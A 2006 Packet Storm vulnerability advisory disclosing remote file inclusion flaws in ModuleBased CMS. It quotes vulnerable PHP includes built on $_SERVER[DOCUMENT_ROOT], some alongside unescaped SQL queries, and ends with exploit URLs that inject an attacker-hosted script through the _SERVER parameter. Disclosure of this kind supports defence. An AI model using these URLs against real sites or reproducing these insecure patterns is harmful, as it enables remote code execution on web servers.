modulebased.txt

2006-09-01T00:00:00
ID PACKETSTORM:49608
Type packetstorm
Reporter sCORPINo
Modified 2006-09-01T00:00:00

Description

                                        
                                            `+ModuleBased CMS(MBCMS) multiple remote file Inclusion  
+discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customability. It is designed +for PHP/MySQL and it is easy to write new modules or templates to suit a particular website.   
+version:alfa 1  
+vendor site:http://sourceforge.net/projects/mbcms/  
+  
+discovered by: ScorpinO  
+location:IRAN/ANZALI  
+sites: WwW.ScorpinO.NeT Www.deltahacking.iR  
+email:amir.scorpino@yahoo.com  
+special tnx to:Dr.trojan,HIV++,D_7J,Vampire,......  
+  
+discovered in avatar.php archive.class.php login.php profile.class.php process.php  
+  
+  
/admin/avatar.php  
  
<?php  
include_once($_SERVER[DOCUMENT_ROOT]."/libs/profile.class.php");  
include($_SERVER[DOCUMENT_ROOT]."/libs/config.php");  
$profile = new Profile();  
$q = mysql_query("SELECT avatar FROM users WHERE username='".$_SESSION['username']."'");  
$r = mysql_fetch_assoc($q);  
  
?>  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
/libs/archive.class.php  
  
<?php   
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");  
class Archive{  
function AllArchives(){  
$q = mysql_query("SELECT * FROM posts") or die (mysql_error());  
while ($r = mysql_fetch_assoc($q)){  
if($r['topic'] == 1)  
$topic = "News";  
if($r['topic'] == 2)  
$topic = "Articles";  
echo $topic;  
$q = mysql_query("SELECT * FROM posts WHERE topic='".$r['topic']."'") or die (mysql_error());  
while($r_posts = mysql_fetch_assoc($q))  
echo $r_posts['post'];  
}  
}  
}  
?>   
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
/libs/login.php  
  
<?php  
if($_POST['login']){  
include_once($_SERVER[DOCUMENT_ROOT]."/libs/user.class.php");  
$user = new User();  
$user->login($_POST['username'], $_POST['pass']);  
}  
?>  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
/libs/profiles.class.php  
  
<?php  
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
/libs/profile/proccess.php  
  
<?php  
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");  
?>  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+exploit:  
+  
+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script]  
+http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script]  
+http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script]  
+http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script]  
+http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]  
  
++  
  
`